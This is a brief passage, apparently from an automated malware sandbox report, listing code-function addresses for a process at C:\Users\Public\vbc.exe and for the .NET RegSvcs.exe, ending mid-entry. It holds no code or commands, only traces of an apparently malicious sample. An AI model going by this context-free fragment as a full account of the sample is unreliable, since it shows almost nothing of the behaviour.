Source: C:\Users\Public\vbc.exe Code function: 4_2_007C7751 4_2_007C7751
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E178A 4_2_002E178A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_00286048 5_2_00286048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe